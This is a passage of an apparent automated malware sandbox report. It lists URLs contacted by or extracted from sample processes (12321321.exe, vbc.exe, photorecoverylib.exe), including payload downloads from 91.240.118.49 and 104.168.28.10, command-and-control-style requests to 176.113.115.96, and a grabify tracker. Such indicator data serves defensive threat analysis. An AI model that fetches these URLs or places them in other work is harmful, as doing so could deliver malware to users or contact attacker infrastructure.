            https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38d926d19fe6595cd66946951e91fcd852008e318dc05672e26e6fd09b4a144c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bcf773cfcdd0%Avira URL Cloudsafe
            https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38a926d19fe6595cd66946951e91fcd852008e318dc05672e26e6fd09b4a144c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bcf773cfcdd0%Avira URL Cloudsafe
            http://104.168.28.10/001.exei0%Avira URL Cloudsafe
            https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f842a1cec7a86d87bdb6546ad12dac02900%Avira URL Cloudsafe
            https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38a926d19fe6595cd66946951e91fcd852000%Avira URL Cloudsafe
            https://91.240.118.49/forsale/silk.exeLMEMP0%Avira URL Cloudsafe
            https://nanoways.com/deactivate0%Avira URL Cloudsafe
            https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38c926d19fe6595cd66946951e91fcd852000%Avira URL Cloudsafe
            https://91.240.118.49/forsale/silk.exel0%Avira URL Cloudsafe
            https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb388926d19fe6595cd66946951e91fcd852008e318dc05672e26e6fd09b4a144c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bcf773cfcdd0%Avira URL Cloudsafe
            https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f872a1cec7a86d87bdb6546ad12dac02908ee11d51a29366be8e843a8ec4cda8eec906920dff156d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935949ca7633f1d8060%Avira URL Cloudsafe
            https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb389926d19fe6595cd66946951e91fcd852008e318dc05672e26e6fd09b4a144c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bcf773cfcdd0%Avira URL Cloudsafe
            http://wwcrosoft.com/pki/certs/MicWinPCA_2010-07-06.crt00%Avira URL Cloudsafe
            https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb386926d19fe6595cd66946951e91fcd852008e318dc05672e26e6fd09b4a144c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bcf773cfcdd0%Avira URL Cloudsafe
            https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f862a1cec7a86d87bdb6546ad12dac02908ee11d51a29366be8e843a8ec4cda8eec906920dff156d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935949ca7633f1d8060%Avira URL Cloudsafe
            https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb387926d19fe6595cd66946951e91fcd852008e318dc05672e26e6fd09b4a144c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bcf773cfcdd0%Avira URL Cloudsafe
            https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f852a1cec7a86d87bdb6546ad12dac02908ee11d51a29366be8e843a8ec4cda8eec906920dff156d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935949ca7633f1d8060%Avira URL Cloudsafe
            https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb386926d19fe6595cd66946951e91fcd852000%Avira URL Cloudsafe
            https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f842a1cec7a86d87bdb6546ad12dac02908ee11d51a29366be8e843a8ec4cda8eec906920dff156d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935949ca7633f1d8060%Avira URL Cloudsafe
            https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb387926d19fe6595cd66946951e91fcd852000%Avira URL Cloudsafe
            https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f812a1cec7a86d87bdb6546ad12dac02908ee11d51a29366be8e843a8ec4cda8eec906920dff156d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935949ca7633f1d8060%Avira URL Cloudsafe
            https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f832a1cec7a86d87bdb6546ad12dac02900%Avira URL Cloudsafe
            https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f822a1cec7a86d87bdb6546ad12dac02908ee11d51a29366be8e843a8ec4cda8eec906920dff156d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935949ca7633f1d8060%Avira URL Cloudsafe
            https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f802a1cec7a86d87bdb6546ad12dac02908ee11d51a29366be8e843a8ec4cda8eec906920dff156d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935949ca7633f1d8060%Avira URL Cloudsafe
            http://104.168.28.10/data/001w(0%Avira URL Cloudsafe
            https://176.113.115.96/y0%Avira URL Cloudsafe
            https://nanoways.com/activate/?prefill=%hs0%Avira URL Cloudsafe
            https://91.240.118.49/0%Avira URL Cloudsafe
            https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f802a1cec7a86d87bdb6546ad12dac02900%Avira URL Cloudsafe
            http://104.168.28.10/data/0010%Avira URL Cloudsafe
            https://176.113.115.96/r0%Avira URL Cloudsafe
            http://www.remobjects.com/psU0%Avira URL Cloudsafe
            https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38d926d19fe6595cd66946951e91fcd852000%Avira URL Cloudsafe
            https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f812a1cec7a86d87bdb6546ad12dac02900%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            No contacted domains info

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f926d19fe6595cd66946851e91fcd85241ab258d81029326be8ee43a8f51f8a95b5cd212a91f953c588fb52d6db9f51a9a0a29d5954cad713479a672918d4348dd7d493554dc9false
            • Avira URL Cloud: safe
            		unknown
            https://91.240.118.49/forsale/silk.exefalse
            • Avira URL Cloud: malware
            		unknown
            http://104.168.28.10/001.exefalse
            • Avira URL Cloud: malware
            		unknown
            https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38c926d19fe6595cd66946951e91fcd852008e318dc05672e26e6fd09b4a144c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bcf773cfcddfalse
            • Avira URL Cloud: safe
            		unknown
            https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38b926d19fe6595cd66946951e91fcd852008e318dc05672e26e6fd09b4a144c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bcf773cfcddfalse
            • Avira URL Cloud: safe
            		unknown
            https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38d926d19fe6595cd66946951e91fcd852008e318dc05672e26e6fd09b4a144c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bcf773cfcddfalse
            • Avira URL Cloud: safe
            		unknown
            https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38a926d19fe6595cd66946951e91fcd852008e318dc05672e26e6fd09b4a144c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bcf773cfcddfalse
            • Avira URL Cloud: safe
            		unknown
            https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb388926d19fe6595cd66946951e91fcd852008e318dc05672e26e6fd09b4a144c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bcf773cfcddfalse
            • Avira URL Cloud: safe
            		unknown
            https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f872a1cec7a86d87bdb6546ad12dac02908ee11d51a29366be8e843a8ec4cda8eec906920dff156d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935949ca7633f1d806false
            • Avira URL Cloud: safe
            		unknown
            https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb389926d19fe6595cd66946951e91fcd852008e318dc05672e26e6fd09b4a144c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bcf773cfcddfalse
            • Avira URL Cloud: safe
            		unknown
            https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f862a1cec7a86d87bdb6546ad12dac02908ee11d51a29366be8e843a8ec4cda8eec906920dff156d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935949ca7633f1d806false
            • Avira URL Cloud: safe
            		unknown
            https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb386926d19fe6595cd66946951e91fcd852008e318dc05672e26e6fd09b4a144c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bcf773cfcddfalse
            • Avira URL Cloud: safe
            		unknown
            https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f852a1cec7a86d87bdb6546ad12dac02908ee11d51a29366be8e843a8ec4cda8eec906920dff156d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935949ca7633f1d806false
            • Avira URL Cloud: safe
            		unknown
            https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb387926d19fe6595cd66946951e91fcd852008e318dc05672e26e6fd09b4a144c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bcf773cfcddfalse
            • Avira URL Cloud: safe
            		unknown
            https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f842a1cec7a86d87bdb6546ad12dac02908ee11d51a29366be8e843a8ec4cda8eec906920dff156d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935949ca7633f1d806false
            • Avira URL Cloud: safe
            		unknown
            https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f822a1cec7a86d87bdb6546ad12dac02908ee11d51a29366be8e843a8ec4cda8eec906920dff156d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935949ca7633f1d806false
            • Avira URL Cloud: safe
            		unknown
            https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f812a1cec7a86d87bdb6546ad12dac02908ee11d51a29366be8e843a8ec4cda8eec906920dff156d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935949ca7633f1d806false
            • Avira URL Cloud: safe
            		unknown
            https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f802a1cec7a86d87bdb6546ad12dac02908ee11d51a29366be8e843a8ec4cda8eec906920dff156d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935949ca7633f1d806false
            • Avira URL Cloud: safe
            		unknown
            http://104.168.28.10/data/001false
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://104.168.28.10/data/001wuvbc.exe, 00000002.00000002.1418587097.000001C612C90000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.1418695436.000001C612CAD000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://104.168.28.10/data/001GPROFILEvbc.exe, 00000002.00000002.1417572787.000001C6128E3000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://91.240.118.49/forsale/silk.exeC:12321321.exe, 00000000.00000002.1416136932.0000000000135000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://104.168.28.10/data/001Mvbc.exe, 00000002.00000002.1418587097.000001C612C90000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.micom/pkiops/Docs/ry.htm0powershell.exe, 00000003.00000002.1638480284.000001F9F89D3000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.microsoft.co12321321.exe, 00000000.00000002.1417238504.0000000003680000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              http://104.168.28.10/data/001Dvbc.exe, 00000002.00000002.1418587097.000001C612C90000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://176.113.115.96/allowedCert_OS_1photorecoverylib.exe, 0000000A.00000002.2564708817.0000000003555000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://104.168.28.10/data/001:vbc.exe, 00000002.00000002.1418695436.000001C612CAD000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f852a1cec7a86d87bdb6546ad12dac0290photorecoverylib.exe, 0000000A.00000002.2563243952.0000000000A14000.00000004.00000020.00020000.00000000.sdmp, photorecoverylib.exe, 0000000A.00000002.2564708817.00000000035A5000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://176.113.115.96/en-GBphotorecoverylib.exe, 0000000A.00000002.2563243952.0000000000A34000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                https://nanoways.com/activateis-37486.tmp.8.drfalse
                • Avira URL Cloud: safe
                		unknown
                http://104.168.28.10/data/0011vbc.exe, 00000002.00000002.1418695436.000001C612CAD000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://91.240.118.49/forsale/silk.exeRRC:12321321.exe, 00000000.00000002.1416136932.0000000000114000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1625894793.000001F9F05EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1558035844.000001F928D69000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f862a1cec7a86d87bdb6546ad12dac0290photorecoverylib.exe, 0000000A.00000002.2563243952.0000000000958000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1486915723.000001F9E0571000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1449748816.000001F918CF1000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://crl.microsZpowershell.exe, 00000003.00000002.1638334995.000001F9F88D0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.innosetup.com/1609a74d-2a2b-4f95-9570-07a864ac654e.tmp, 1609a74d-2a2b-4f95-9570-07a864ac654e.tmp, 00000008.00000002.2562884264.0000000000401000.00000020.00000001.01000000.0000000D.sdmpfalse
                      		high
                      https://91.240.118.49/forsale/silk.exea12321321.exe, 00000000.00000002.1416136932.0000000000114000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb389926d19fe6595cd66946951e91fcd85200photorecoverylib.exe, 0000000A.00000002.2564708817.0000000003555000.00000004.00000020.00020000.00000000.sdmp, photorecoverylib.exe, 0000000A.00000002.2563243952.0000000000A14000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.1449748816.000001F918F17000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb388926d19fe6595cd66946951e91fcd85200photorecoverylib.exe, 0000000A.00000002.2563243952.0000000000A14000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.1486915723.000001F9E0798000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1449748816.000001F918F17000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.1449748816.000001F918F17000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://91.240.118.49/forsale/silk.exeU12321321.exe, 00000000.00000002.1416136932.0000000000114000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://contoso.com/Iconpowershell.exe, 00000005.00000002.1558035844.000001F928D69000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline1609a74d-2a2b-4f95-9570-07a864ac654e.exe, 1609a74d-2a2b-4f95-9570-07a864ac654e.exe, 00000007.00000000.1415794332.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, silk[1].exe.0.drfalse
                                		high
                                http://icu-project.orgis-MLBF0.tmp.8.drfalse
                                  		high
                                  https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.1449748816.000001F918F17000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://nanoways.com/deactivate/?prefill=%hsis-37486.tmp.8.drfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://104.168.28.10/data/001wvbc.exe, 00000002.00000002.1418695436.000001C612CAD000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38b926d19fe6595cd66946951e91fcd85200photorecoverylib.exe, 0000000A.00000002.2563243952.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, photorecoverylib.exe, 0000000A.00000002.2564708817.0000000003555000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://91.240.118.49/forsale/silk.exe?12321321.exe, 00000000.00000002.1416136932.0000000000114000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://104.168.28.10/data/001ovbc.exe, 00000002.00000002.1418587097.000001C612C90000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.1486915723.000001F9E0798000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1449748816.000001F918F17000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f926d19fe6595cd66946851e91fcd85241photorecoverylib.exe, 0000000A.00000002.2563243952.0000000000A34000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.easycutstudio.com/support.html1609a74d-2a2b-4f95-9570-07a864ac654e.exe, 00000007.00000003.1416863649.0000000002091000.00000004.00001000.00020000.00000000.sdmp, 1609a74d-2a2b-4f95-9570-07a864ac654e.exe, 00000007.00000003.1416786459.0000000002300000.00000004.00001000.00020000.00000000.sdmp, 1609a74d-2a2b-4f95-9570-07a864ac654e.exe, 00000007.00000002.2563198831.0000000002091000.00000004.00001000.00020000.00000000.sdmp, 1609a74d-2a2b-4f95-9570-07a864ac654e.tmp, 00000008.00000003.1419896826.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, 1609a74d-2a2b-4f95-9570-07a864ac654e.tmp, 00000008.00000002.2563883881.00000000021B8000.00000004.00001000.00020000.00000000.sdmp, 1609a74d-2a2b-4f95-9570-07a864ac654e.tmp, 00000008.00000003.1420021294.00000000021B8000.00000004.00001000.00020000.00000000.sdmp, 1609a74d-2a2b-4f95-9570-07a864ac654e.tmp, 00000008.00000002.2563383349.000000000076F000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://nanoways.com/check/%hsis-37486.tmp.8.drfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://104.168.28.10/data/001_vbc.exe, 00000002.00000002.1418695436.000001C612CAD000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://176.113.115.96/M32photorecoverylib.exe, 0000000A.00000002.2564708817.0000000003555000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f872a1cec7a86d87bdb6546ad12dac0290photorecoverylib.exe, 0000000A.00000002.2564708817.000000000359D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://176.113.115.96/Cphotorecoverylib.exe, 0000000A.00000002.2564708817.0000000003555000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://176.113.115.96/photorecoverylib.exe, 0000000A.00000002.2564708817.0000000003555000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://nanoways.com/qr/%1is-37486.tmp.8.drfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU1609a74d-2a2b-4f95-9570-07a864ac654e.exe, 00000007.00000000.1415794332.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, silk[1].exe.0.drfalse
                                            		high
                                            https://176.113.115.96/Fphotorecoverylib.exe, 0000000A.00000002.2564708817.0000000003555000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://contoso.com/Licensepowershell.exe, 00000005.00000002.1558035844.000001F928D69000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f842a1cec7a86d87bdb6546ad12dac0290photorecoverylib.exe, 0000000A.00000002.2563243952.0000000000A14000.00000004.00000020.00020000.00000000.sdmp, photorecoverylib.exe, 0000000A.00000002.2563243952.0000000000A24000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://176.113.115.96/priseCertificatesphotorecoverylib.exe, 0000000A.00000002.2563243952.0000000000A34000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://91.240.118.49/forsale/silk.exeLMEMP12321321.exe, 00000000.00000002.1417238504.0000000003680000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://curl.haxx.se/docs/http-cookies.htmlvbc.exe, 00000002.00000002.1397936172.000000014007F000.00000002.00000400.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://104.168.28.10/001.exei12321321.exe, 00000000.00000002.1416136932.00000000000AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38a926d19fe6595cd66946951e91fcd85200photorecoverylib.exe, 0000000A.00000002.2563243952.0000000000A34000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://cs-g2-crl.thawte.com/ThawteCSG2.crl0Hmas5kDc_8664.sys.2.drfalse
                                                    		high
                                                    https://nanoways.com/deactivateis-37486.tmp.8.drfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38c926d19fe6595cd66946951e91fcd85200photorecoverylib.exe, 0000000A.00000002.2563243952.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, photorecoverylib.exe, 0000000A.00000002.2564708817.0000000003555000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://contoso.com/powershell.exe, 00000005.00000002.1558035844.000001F928D69000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://176.113.115.96/rosoftphotorecoverylib.exe, 0000000A.00000002.2564708817.0000000003555000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://91.240.118.49/forsale/silk.exel12321321.exe, 00000000.00000002.1417238504.0000000003680000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://wwcrosoft.com/pki/certs/MicWinPCA_2010-07-06.crt0powershell.exe, 00000005.00000002.1578566714.000001F9312DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1625894793.000001F9F05EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1558035844.000001F928D69000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb386926d19fe6595cd66946951e91fcd85200photorecoverylib.exe, 0000000A.00000002.2563243952.0000000000A14000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb387926d19fe6595cd66946951e91fcd85200photorecoverylib.exe, 0000000A.00000002.2564708817.0000000003599000.00000004.00000020.00020000.00000000.sdmp, photorecoverylib.exe, 0000000A.00000002.2563243952.0000000000A14000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://www.openssl.org/docs/faq.htmlphotorecoverylib.exe, 0000000A.00000000.1440851005.00000000007A4000.00000002.00000001.01000000.00000011.sdmpfalse
                                                            		high
                                                            http://ocsp.thawte.com0Hmas5kDc_8664.sys.2.drfalse
                                                              		high
                                                              https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f832a1cec7a86d87bdb6546ad12dac0290photorecoverylib.exe, 0000000A.00000002.2564708817.0000000003596000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://104.168.28.10/data/001w(vbc.exe, 00000002.00000002.1418695436.000001C612CAD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://176.113.115.96/yphotorecoverylib.exe, 0000000A.00000002.2564708817.0000000003555000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://nanoways.com/activate/?prefill=%hsis-37486.tmp.8.drfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://91.240.118.49/12321321.exe, 00000000.00000002.1416136932.0000000000114000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://176.113.115.96/rphotorecoverylib.exe, 0000000A.00000002.2563243952.0000000000A34000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f802a1cec7a86d87bdb6546ad12dac0290photorecoverylib.exe, 0000000A.00000002.2564708817.000000000359D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://grabify.link/64F2HHvbc.exe, 00000002.00000002.1419458463.000001C612CCD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.remobjects.com/psU1609a74d-2a2b-4f95-9570-07a864ac654e.exe, 00000007.00000003.1417508392.0000000002098000.00000004.00001000.00020000.00000000.sdmp, 1609a74d-2a2b-4f95-9570-07a864ac654e.exe, 00000007.00000003.1417203223.0000000002300000.00000004.00001000.00020000.00000000.sdmp, 1609a74d-2a2b-4f95-9570-07a864ac654e.tmp, 00000008.00000002.2562884264.0000000000401000.00000020.00000001.01000000.0000000D.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://grabify.link/64F2HH((pvbc.exe, 00000002.00000002.1419458463.000001C612CCD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://crl.thawte.com/ThawtePCA.crl0Hmas5kDc_8664.sys.2.drfalse
                                                                    		high
                                                                    https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38d926d19fe6595cd66946951e91fcd85200photorecoverylib.exe, 0000000A.00000002.2563243952.0000000000A34000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://176.113.115.96/fphotorecoverylib.exe, 0000000A.00000002.2564708817.0000000003555000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f812a1cec7a86d87bdb6546ad12dac0290photorecoverylib.exe, 0000000A.00000002.2564708817.000000000359D000.00000004.00000020.00020000.00000000.sdmpfalse
